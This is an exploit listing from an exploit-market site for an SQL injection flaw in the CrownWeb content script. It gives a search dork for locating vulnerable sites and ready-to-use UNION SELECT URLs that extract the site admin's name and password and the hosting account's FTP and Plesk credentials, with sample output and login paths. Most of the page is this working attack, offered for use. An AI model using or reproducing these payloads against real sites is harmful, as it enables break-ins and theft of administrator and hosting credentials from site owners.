[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

crownweb (page.cfm) Sql Injection Vulnerability

Author
AtT4CKxT3rR0r1ST
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10746
Category
web applications
Date add
31-01-2010
Platform
unsorted
===============================================
crownweb (page.cfm) Sql Injection Vulnerability
===============================================

.:. Script : crownweb
.:. Language : Cfm
.:. Script Download: http://www.crownweb.net/
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : "Powered By CrownWeb.net!" inurl:"page.cfm"

===[ Exploit ]===
 
www.Localhost.com/page.cfm?id=[Sql Injection]
 
********************************************************************
T0 Get Username & Password Admin Site
 
[Sql Injection ; {Name & password Admin}]
 
www.Localhost.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,concat(name,0x3a,password),6+from+author
 
WEBSITE LOGIN: www.localhost.com/siteadmin/
 
[~] Name : Webadmin
[~] Password : Sec-Attack
 
********************************************************************
T0 Get Username & Password Plesk Control Panel
 
[Sql Injection ; {Username & Password Plesk Control Panel}]
 
www.Localhost.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,concat(ftpserver,0x3a,domainname,0x3a,ftpusername,0x3a,ftppassword),6+from+webdata
 
WEBSITE LOGIN: https://IP SRVER:8443/login.php3
 
[~] ftpserver : 127.0.0.1
[~] domainname : Localhost.com
[~] ftpusername : Root
[~] ftppassword : Sec-Attack
 
####################################################################



#  0day.today [2024-12-25]  #